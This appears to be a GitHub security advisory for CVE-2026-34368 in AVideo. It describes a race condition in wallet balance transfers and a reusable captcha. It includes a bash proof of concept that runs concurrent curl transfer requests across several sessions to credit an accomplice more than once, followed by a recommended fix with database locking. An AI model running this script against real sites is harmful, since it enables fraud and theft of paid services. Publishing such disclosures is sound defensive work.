GHSA-H54M-C522-H6QR
Vulnerability from github – Published: 2026-03-30 17:51 – Updated: 2026-03-30 17:51Summary
The transferBalance() method in plugin/YPTWallet/YPTWallet.php contains a Time-of-Check-Time-of-Use (TOCTOU) race condition. The method reads the sender's wallet balance, checks sufficiency in PHP, then writes the new balance — all without database transactions or row-level locking. An attacker with multiple authenticated sessions can send concurrent transfer requests that all read the same stale balance, each passing the balance check independently, resulting in only one deduction being applied while the recipient is credited multiple times.
Details
The vulnerable code path in plugin/YPTWallet/YPTWallet.php:450-517:
// Line 473-474: READ - fetch current balance (plain SELECT, no FOR UPDATE)
$senderWallet = self::getWallet($fromUserId);
$senderBalance = $senderWallet->getBalance();
$senderNewBalance = $senderBalance - $amount;
// Line 477: CHECK - verify sufficient funds in PHP
if ($senderNewBalance < 0) {
return false;
}
// Line 486-487: WRITE - set new balance (plain UPDATE)
$senderWallet->setBalance($senderNewBalance);
$senderWalletId = $senderWallet->save();
// Line 497-502: Credit receiver (also plain SELECT + UPDATE)
$receiverWallet = self::getWallet($toUserId);
$receiverBalance = $receiverWallet->getBalance();
$receiverNewBalance = $receiverBalance + $amount;
$receiverWallet->setBalance($receiverNewBalance);
$receiverWalletId = $receiverWallet->save();
The getWallet() method (YPTWallet.php:244) calls Wallet::getFromUser() (Wallet.php:69-84) which executes a plain SELECT * FROM wallet WHERE users_id = $users_id with no FOR UPDATE clause. The save() method (Wallet.php:105) calls ObjectYPT::save() (Object.php:293) which executes a plain UPDATE — no transaction wrapping.
Race window: Between the SELECT (step 1) and UPDATE (step 3), all concurrent requests see the same original balance. Each independently computes original - amount, passes the check, and writes back. The last writer wins for the sender (only one deduction effective), but the receiver gets credited once per request.
Why concurrent requests succeed: PHP's file-based session locking serializes requests per session. However, an attacker can create multiple login sessions (different PHPSESSID cookies) for the same user account. Each session has its own lock and can execute concurrently. Each session needs its own captcha, but the captcha validation in objects/captcha.php:58-73 compares $_SESSION['palavra'] without unsetting it after validation, allowing unlimited reuse within each session.
Entry point: plugin/YPTWallet/view/transferFunds.json.php:39 calls YPTWallet::transferBalance(User::getId(), $_POST['users_id'], $_POST['value']) — requires only User::isLogged() and a valid captcha.
PoC
# Prerequisites: Attacker has a registered account with $10 wallet balance
# Accomplice has a registered account (recipient)
TARGET="https://target-avideo-instance"
ACCOMPLICE_ID=123 # recipient user ID
# Step 1: Create 5 independent sessions for the same attacker account
declare -a SESSIONS
declare -a CAPTCHA_ANSWERS
for i in $(seq 1 5); do
# Login and capture session cookie
COOKIE=$(curl -s -c - "$TARGET/objects/login.json.php" \
-d 'user=attacker&pass=attackerpass' | grep PHPSESSID | awk '{print $NF}')
# Load captcha to populate $_SESSION['palavra']
curl -s -b "PHPSESSID=$COOKIE" "$TARGET/objects/captcha.php" -o "captcha_$i.png"
SESSIONS[$i]=$COOKIE
echo "Session $i: $COOKIE — solve captcha_$i.png manually"
done
# Step 2: After solving captchas, fire all 5 transfer requests simultaneously
# Each requests $10 transfer — all will read balance=$10 concurrently
for i in $(seq 1 5); do
curl -s -b "PHPSESSID=${SESSIONS[$i]}" \
"$TARGET/plugin/YPTWallet/view/transferFunds.json.php" \
-d "users_id=$ACCOMPLICE_ID&value=10&captcha=${CAPTCHA_ANSWERS[$i]}" &
done
wait
# Expected result:
# - Attacker balance: $0 (last write wins, sets balance to 10-10=0)
# - Accomplice balance: credited $10 x N successful races (up to $50)
# - Net money created from nothing: up to $40
Impact
An authenticated attacker can exploit this race condition to:
- Create wallet balance from nothing: With a $10 balance and N concurrent requests, the recipient can receive up to $10×N while the sender only loses $10.
- Bypass pay-per-view charges: Inflate wallet balance, then purchase paid content without real payment.
- Bypass subscription fees: Use inflated balance to purchase subscriptions.
- Financial integrity compromise: The wallet ledger becomes inconsistent — total balances across all users no longer match total deposits.
The attack requires solving one captcha per session (captchas are reusable within a session), creating multiple login sessions, and timing concurrent requests — achievable with basic scripting.
Recommended Fix
Replace the read-check-write pattern with an atomic database operation using a transaction and row-level locking:
public static function transferBalance($fromUserId, $toUserId, $amount, $customDescription = "", $forceTransfer = false)
{
global $global;
// ... existing auth and validation checks ...
$amount = floatval($amount);
if ($amount <= 0) {
return false;
}
// Use a database transaction with row-level locking
$global['mysqli']->autocommit(false);
$global['mysqli']->begin_transaction();
try {
// Lock sender row and read balance atomically
$sql = "SELECT id, balance FROM wallet WHERE users_id = ? FOR UPDATE";
$stmt = $global['mysqli']->prepare($sql);
$stmt->bind_param("i", $fromUserId);
$stmt->execute();
$result = $stmt->get_result();
$senderRow = $result->fetch_assoc();
$stmt->close();
if (empty($senderRow)) {
$global['mysqli']->rollback();
return false;
}
$senderBalance = floatval($senderRow['balance']);
$senderNewBalance = $senderBalance - $amount;
if ($senderNewBalance < 0) {
$global['mysqli']->rollback();
return false;
}
// Atomic deduction
$sql = "UPDATE wallet SET balance = ? WHERE id = ? AND balance >= ?";
$stmt = $global['mysqli']->prepare($sql);
$stmt->bind_param("did", $senderNewBalance, $senderRow['id'], $amount);
$stmt->execute();
if ($stmt->affected_rows === 0) {
$global['mysqli']->rollback();
$stmt->close();
return false;
}
$stmt->close();
// Credit receiver (also locked)
$sql = "SELECT id, balance FROM wallet WHERE users_id = ? FOR UPDATE";
$stmt = $global['mysqli']->prepare($sql);
$stmt->bind_param("i", $toUserId);
$stmt->execute();
$result = $stmt->get_result();
$receiverRow = $result->fetch_assoc();
$stmt->close();
$receiverNewBalance = floatval($receiverRow['balance']) + $amount;
$sql = "UPDATE wallet SET balance = ? WHERE id = ?";
$stmt = $global['mysqli']->prepare($sql);
$stmt->bind_param("di", $receiverNewBalance, $receiverRow['id']);
$stmt->execute();
$stmt->close();
$global['mysqli']->commit();
// ... log entries ...
} catch (Exception $e) {
$global['mysqli']->rollback();
return false;
} finally {
$global['mysqli']->autocommit(true);
}
}
Additionally, fix the captcha reuse issue in objects/captcha.php:58-73 by unsetting $_SESSION['palavra'] after successful validation:
public static function validation($word)
{
// ... existing checks ...
$validation = (strcasecmp($word, $_SESSION["palavra"]) == 0);
if ($validation) {
unset($_SESSION["palavra"]); // Consume the captcha token
}
return $validation;
}
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "26.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34368"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-30T17:51:12Z",
"nvd_published_at": "2026-03-27T18:16:05Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `transferBalance()` method in `plugin/YPTWallet/YPTWallet.php` contains a Time-of-Check-Time-of-Use (TOCTOU) race condition. The method reads the sender\u0027s wallet balance, checks sufficiency in PHP, then writes the new balance \u2014 all without database transactions or row-level locking. An attacker with multiple authenticated sessions can send concurrent transfer requests that all read the same stale balance, each passing the balance check independently, resulting in only one deduction being applied while the recipient is credited multiple times.\n\n## Details\n\nThe vulnerable code path in `plugin/YPTWallet/YPTWallet.php:450-517`:\n\n```php\n// Line 473-474: READ - fetch current balance (plain SELECT, no FOR UPDATE)\n$senderWallet = self::getWallet($fromUserId);\n$senderBalance = $senderWallet-\u003egetBalance();\n$senderNewBalance = $senderBalance - $amount;\n\n// Line 477: CHECK - verify sufficient funds in PHP\nif ($senderNewBalance \u003c 0) {\n return false;\n}\n\n// Line 486-487: WRITE - set new balance (plain UPDATE)\n$senderWallet-\u003esetBalance($senderNewBalance);\n$senderWalletId = $senderWallet-\u003esave();\n\n// Line 497-502: Credit receiver (also plain SELECT + UPDATE)\n$receiverWallet = self::getWallet($toUserId);\n$receiverBalance = $receiverWallet-\u003egetBalance();\n$receiverNewBalance = $receiverBalance + $amount;\n$receiverWallet-\u003esetBalance($receiverNewBalance);\n$receiverWalletId = $receiverWallet-\u003esave();\n```\n\nThe `getWallet()` method (`YPTWallet.php:244`) calls `Wallet::getFromUser()` (`Wallet.php:69-84`) which executes a plain `SELECT * FROM wallet WHERE users_id = $users_id` with no `FOR UPDATE` clause. The `save()` method (`Wallet.php:105`) calls `ObjectYPT::save()` (`Object.php:293`) which executes a plain `UPDATE` \u2014 no transaction wrapping.\n\n**Race window**: Between the SELECT (step 1) and UPDATE (step 3), all concurrent requests see the same original balance. Each independently computes `original - amount`, passes the check, and writes back. The last writer wins for the sender (only one deduction effective), but the receiver gets credited once per request.\n\n**Why concurrent requests succeed**: PHP\u0027s file-based session locking serializes requests per session. However, an attacker can create multiple login sessions (different PHPSESSID cookies) for the same user account. Each session has its own lock and can execute concurrently. Each session needs its own captcha, but the captcha validation in `objects/captcha.php:58-73` compares `$_SESSION[\u0027palavra\u0027]` without unsetting it after validation, allowing unlimited reuse within each session.\n\nEntry point: `plugin/YPTWallet/view/transferFunds.json.php:39` calls `YPTWallet::transferBalance(User::getId(), $_POST[\u0027users_id\u0027], $_POST[\u0027value\u0027])` \u2014 requires only `User::isLogged()` and a valid captcha.\n\n## PoC\n\n```bash\n# Prerequisites: Attacker has a registered account with $10 wallet balance\n# Accomplice has a registered account (recipient)\n\nTARGET=\"https://target-avideo-instance\"\nACCOMPLICE_ID=123 # recipient user ID\n\n# Step 1: Create 5 independent sessions for the same attacker account\ndeclare -a SESSIONS\ndeclare -a CAPTCHA_ANSWERS\n\nfor i in $(seq 1 5); do\n # Login and capture session cookie\n COOKIE=$(curl -s -c - \"$TARGET/objects/login.json.php\" \\\n -d \u0027user=attacker\u0026pass=attackerpass\u0027 | grep PHPSESSID | awk \u0027{print $NF}\u0027)\n \n # Load captcha to populate $_SESSION[\u0027palavra\u0027]\n curl -s -b \"PHPSESSID=$COOKIE\" \"$TARGET/objects/captcha.php\" -o \"captcha_$i.png\"\n \n SESSIONS[$i]=$COOKIE\n echo \"Session $i: $COOKIE \u2014 solve captcha_$i.png manually\"\ndone\n\n# Step 2: After solving captchas, fire all 5 transfer requests simultaneously\n# Each requests $10 transfer \u2014 all will read balance=$10 concurrently\nfor i in $(seq 1 5); do\n curl -s -b \"PHPSESSID=${SESSIONS[$i]}\" \\\n \"$TARGET/plugin/YPTWallet/view/transferFunds.json.php\" \\\n -d \"users_id=$ACCOMPLICE_ID\u0026value=10\u0026captcha=${CAPTCHA_ANSWERS[$i]}\" \u0026\ndone\nwait\n\n# Expected result:\n# - Attacker balance: $0 (last write wins, sets balance to 10-10=0)\n# - Accomplice balance: credited $10 x N successful races (up to $50)\n# - Net money created from nothing: up to $40\n```\n\n## Impact\n\nAn authenticated attacker can exploit this race condition to:\n\n- **Create wallet balance from nothing**: With a $10 balance and N concurrent requests, the recipient can receive up to $10\u00d7N while the sender only loses $10.\n- **Bypass pay-per-view charges**: Inflate wallet balance, then purchase paid content without real payment.\n- **Bypass subscription fees**: Use inflated balance to purchase subscriptions.\n- **Financial integrity compromise**: The wallet ledger becomes inconsistent \u2014 total balances across all users no longer match total deposits.\n\nThe attack requires solving one captcha per session (captchas are reusable within a session), creating multiple login sessions, and timing concurrent requests \u2014 achievable with basic scripting.\n\n## Recommended Fix\n\nReplace the read-check-write pattern with an atomic database operation using a transaction and row-level locking:\n\n```php\npublic static function transferBalance($fromUserId, $toUserId, $amount, $customDescription = \"\", $forceTransfer = false)\n{\n global $global;\n \n // ... existing auth and validation checks ...\n \n $amount = floatval($amount);\n if ($amount \u003c= 0) {\n return false;\n }\n\n // Use a database transaction with row-level locking\n $global[\u0027mysqli\u0027]-\u003eautocommit(false);\n $global[\u0027mysqli\u0027]-\u003ebegin_transaction();\n \n try {\n // Lock sender row and read balance atomically\n $sql = \"SELECT id, balance FROM wallet WHERE users_id = ? FOR UPDATE\";\n $stmt = $global[\u0027mysqli\u0027]-\u003eprepare($sql);\n $stmt-\u003ebind_param(\"i\", $fromUserId);\n $stmt-\u003eexecute();\n $result = $stmt-\u003eget_result();\n $senderRow = $result-\u003efetch_assoc();\n $stmt-\u003eclose();\n \n if (empty($senderRow)) {\n $global[\u0027mysqli\u0027]-\u003erollback();\n return false;\n }\n \n $senderBalance = floatval($senderRow[\u0027balance\u0027]);\n $senderNewBalance = $senderBalance - $amount;\n \n if ($senderNewBalance \u003c 0) {\n $global[\u0027mysqli\u0027]-\u003erollback();\n return false;\n }\n \n // Atomic deduction\n $sql = \"UPDATE wallet SET balance = ? WHERE id = ? AND balance \u003e= ?\";\n $stmt = $global[\u0027mysqli\u0027]-\u003eprepare($sql);\n $stmt-\u003ebind_param(\"did\", $senderNewBalance, $senderRow[\u0027id\u0027], $amount);\n $stmt-\u003eexecute();\n \n if ($stmt-\u003eaffected_rows === 0) {\n $global[\u0027mysqli\u0027]-\u003erollback();\n $stmt-\u003eclose();\n return false;\n }\n $stmt-\u003eclose();\n \n // Credit receiver (also locked)\n $sql = \"SELECT id, balance FROM wallet WHERE users_id = ? FOR UPDATE\";\n $stmt = $global[\u0027mysqli\u0027]-\u003eprepare($sql);\n $stmt-\u003ebind_param(\"i\", $toUserId);\n $stmt-\u003eexecute();\n $result = $stmt-\u003eget_result();\n $receiverRow = $result-\u003efetch_assoc();\n $stmt-\u003eclose();\n \n $receiverNewBalance = floatval($receiverRow[\u0027balance\u0027]) + $amount;\n $sql = \"UPDATE wallet SET balance = ? WHERE id = ?\";\n $stmt = $global[\u0027mysqli\u0027]-\u003eprepare($sql);\n $stmt-\u003ebind_param(\"di\", $receiverNewBalance, $receiverRow[\u0027id\u0027]);\n $stmt-\u003eexecute();\n $stmt-\u003eclose();\n \n $global[\u0027mysqli\u0027]-\u003ecommit();\n \n // ... log entries ...\n \n } catch (Exception $e) {\n $global[\u0027mysqli\u0027]-\u003erollback();\n return false;\n } finally {\n $global[\u0027mysqli\u0027]-\u003eautocommit(true);\n }\n}\n```\n\nAdditionally, fix the captcha reuse issue in `objects/captcha.php:58-73` by unsetting `$_SESSION[\u0027palavra\u0027]` after successful validation:\n\n```php\npublic static function validation($word)\n{\n // ... existing checks ...\n $validation = (strcasecmp($word, $_SESSION[\"palavra\"]) == 0);\n if ($validation) {\n unset($_SESSION[\"palavra\"]); // Consume the captcha token\n }\n return $validation;\n}\n```",
"id": "GHSA-h54m-c522-h6qr",
"modified": "2026-03-30T17:51:12Z",
"published": "2026-03-30T17:51:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-h54m-c522-h6qr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34368"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/34132ad5159784bfc7ba0d7634bb5c79b769202d"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "AVideo Vulnerable to Wallet Balance Double-Spend via TOCTOU Race Condition in transferBalance"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.